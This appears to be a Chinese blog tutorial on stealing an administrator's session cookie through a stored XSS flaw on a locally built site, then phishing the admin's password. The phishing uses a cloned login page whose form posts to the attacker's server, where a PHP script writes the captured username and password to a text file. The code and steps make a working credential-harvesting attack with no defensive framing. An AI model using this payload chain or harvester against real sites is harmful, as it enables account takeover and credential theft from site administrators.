xss盗取cookie加钓鱼

本地搭建一个带有xss漏洞源码 插入js代码简单弹个窗

b541212f79a248eda08eee0570cb11e0.png

ce894d5a12e44099ab1411a89e4d9d1b.png 

在xss平台创建项目

66d3555bd63545178faedbe691c0b93c.png 

将xss平台的payload丢进筐里管理员登陆就可以盗取cookie加登陆

a12f4d5edc734592ab9dcdef2ff1ee14.png 

成功拿到cookie并且利用cookie登陆后台

fd6a6f9f14144e2b8c3b51c10c4a81b6.png 

4c1a193a87a64a4597963d69b427989c.png 

xss钓鱼 

通过伪造登陆页面来诱惑管理员上钩右键下载网页的html1f0b65ea409d47a0b6a00d4b8bdfa4fa.png

 打开html添加from表单

da25731dec4943538393ae813809463c.png

   <form action="http://你服务器的地址/add.php" method="post" id="loginFcaFrom">

这段代码创建了一个POST方法的表单,将用户输入的数据提交到"http://xxxxz/add.php"这个目标URL,并使用ID "loginFcaFrom" 作为表单的唯一标识。

编写add.php来接受输入的密码

<?php
$user = $_POST['admin_name'];
$pwd = $_POST['admin_password'];
$all = "$user \n $pwd";
$f = fopen("context.txt",'w');
fwrite($f,"admin_name:$user \n admin_possword:$pwd");
?>

<?php
// 从POST请求中获取管理员用户名和密码
$user = $_POST['admin_name'];
$pwd = $_POST['admin_password'];

// 将用户名和密码拼接成字符串
$all = "$user \n $pwd";

// 打开名为"context.txt"的文件,以写入模式
$f = fopen("context.txt", 'w');

// 向context.txt中写入管理员用户名和密码信息
fwrite($f, "admin_name:$user \n admin_password:$pwd");
?>

现在只需要在自己服务器搭建这个项目 然后利用xss在那登陆后台之后伪造登陆已过期 然后点击跳转到我们的钓鱼页面就可以了

2e502b32d7724f7fa9594589aaf8305d.png

xss平台创建此项目 放进刚刚的筐里提交

1b061004a6e9434ba1916df13dad0f59.png 

我们模拟管理员登陆到后台然后就自动提示登陆过期 点击一下就跳转到我们的钓鱼页面

ee8be0c347f34809975e039c20ac73aa.png

 

8797f475bf9f477d8bb01b0349d3b5d4.png 

 我们输入账号密码后我们的txt就自动接收到了账号密码

a567bd9231e441508c03aca2ef4007b1.png

管理员的账号密码就可以被我们钓出来了

 

本文比较简单 大佬轻点喷可以加qq联系3661629617

  • 5
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值